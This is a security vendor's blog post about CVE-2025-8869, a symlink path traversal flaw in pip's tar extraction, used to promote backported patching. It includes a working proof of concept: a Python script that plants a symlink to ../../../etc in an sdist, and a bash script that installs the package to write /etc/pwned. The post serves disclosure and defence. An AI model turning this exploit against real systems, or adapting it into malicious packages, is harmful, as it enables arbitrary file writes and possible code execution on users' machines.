Seal Security raises $13M series A to secure open source code at scale. Read full press release.
.avif)
A fundamental security misalignment occurs when a fix for a security vulnerability is merged into an open source project but remains unavailable to users in a stable release. This paradox is currently exemplified by CVE-2025-8869, a moderate-severity path traversal vulnerability in pip, the Python's package installer.
The fix for this flaw, which involves insecure handling of symbolic links during tar archive extraction, has been reviewed and published to the pip source code repository. Despite the fix being ready, the latest stable release (v25.2) does not include it. Since the pip team adheres to a rigid quarterly release schedule (January, April, July, October), organizations are forced to accept a mandatory exposure window that can last up to 90 days. This delay fundamentally compromises modern risk management standards.
The details of CVE-2025-8869, including the exploit mechanism, are publicly available. This transparency, while beneficial for security research, lets attackers leverage this information to craft exploits against unpatched systems, while defenders are left waiting for the next scheduled pip release. The common advice to "always update" falls short here, as there is no official update available for a significant period. This critical gap creates an extended window of vulnerability where even diligent users are exposed to known threats.
The moderate-severity flaw (CVSS 5.9) is a path traversal exploit where a malicious Source Distribution (sdist) can use symbolic links to trick pip into writing files outside the intended extraction directory. This enables an Arbitrary File Write (AFW) vector that can pivot to Remote Code Execution (RCE).
The vulnerability specifically targets pip's custom fallback mechanism. This code is activated only when pip runs on older Python versions that do not natively implement the secure defaults mandated by PEP 706. These vulnerable runtimes include Python versions older than: 3.9.17, 3.10.12, 3.11.4, or 3.12, which are still widely used. In these environments, pip's custom extraction code failed to adequately check symbolic links, allowing a bypass of containment measures.
First, a python script that takes a benign sdist python package and creates a python package that exploits the vulnerability to write an arbitrary file at /etc/pwned.
import sys
import io
import tarfile
from pathlib import Path
def create_tar_evil_rel(existing_tarfile: str) -> None:
project_name = "CVE-2025-8869-poc"
exitsting_tar_path = Path(existing_tarfile)
evil_tar_path = exitsting_tar_path.parent / ("evil-" + exitsting_tar_path.name)
with tarfile.open(existing_tarfile, "r:gz") as existing_tar:
with tarfile.open(evil_tar_path, "w:gz") as tar:
# create an evil symlink pointing to directory outside the archive
info = tarfile.TarInfo(f"{project_name}-0.1.0/{project_name}/evil_symlink")
info.type = tarfile.SYMTYPE
info.linkpath = "../../../etc"
tar.addfile(info)
# create an arbitrary file inside the evil symlink directory
info = tarfile.TarInfo(
f"{project_name}-0.1.0/{project_name}/evil_symlink/pwned"
)
content = "arbitrary file write\n"
info.size = len(content)
tar.addfile(info, io.BytesIO(content.encode()))
# copy the content of the basic package
for member in existing_tar.getmembers():
file_obj = existing_tar.extractfile(member) if member.isfile() else None
tar.addfile(member, file_obj)
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python CVE-2025-8869-poc.py <existing_tarfile>")
sys.exit(1)
create_tar_evil_rel(sys.argv[1])Now, we can create an innocent python package, create a malicious package and install it, to exploit the vulnerability:
#!/bin/bash
set -e
# create a basic python package
mkdir -p CVE-2025-8869-poc
touch CVE-2025-8869-poc/__init__.py
echo "from setuptools import setup, find_packages
setup(
name='CVE-2025-8869-poc',
version='0.1.0',
packages=find_packages(),
)" > setup.py
python setup.py sdist # creates dist/CVE-2025-8869-poc-0.1.0.tar.gz
# add the CVE exploit
python CVE-2025-8869-poc.py dist/CVE-2025-8869-poc-0.1.0.tar.gz
# install the evil package
pip install -U pip==25.2 # latest pip at this time
pip install --no-binary :all: dist/evil-CVE-2025-8869-poc-0.1.0.tar.gz
cat /etc/pwned
# malicious output: "arbitrary file write"CVE-2025-8869 demonstrates that relying on the stable, quarterly release schedule of foundational OSS projects like pip forces enterprises to inherit security debt and prolonged risk. By adopting backported patching, organizations can neutralize critical threats immediately, ensuring continuous compliance and safeguarding the software supply chain without being constrained by the upstream release calendar.
Seal Security gives your team the tools to integrate backported patching into your open source stack, all in just a few clicks and even when an official patch may not be available yet.
As seen with this vulnerability, the time lag for official patches can leave organizations unprotected. Seal Security's ability to swiftly analyze, patch, and deliver solutions for vulnerabilities provides a crucial layer of defense, ensuring that our customers remain protected against the latest threats. Stay secure, stay proactive.
To see this solution in action schedule time with one of our experts.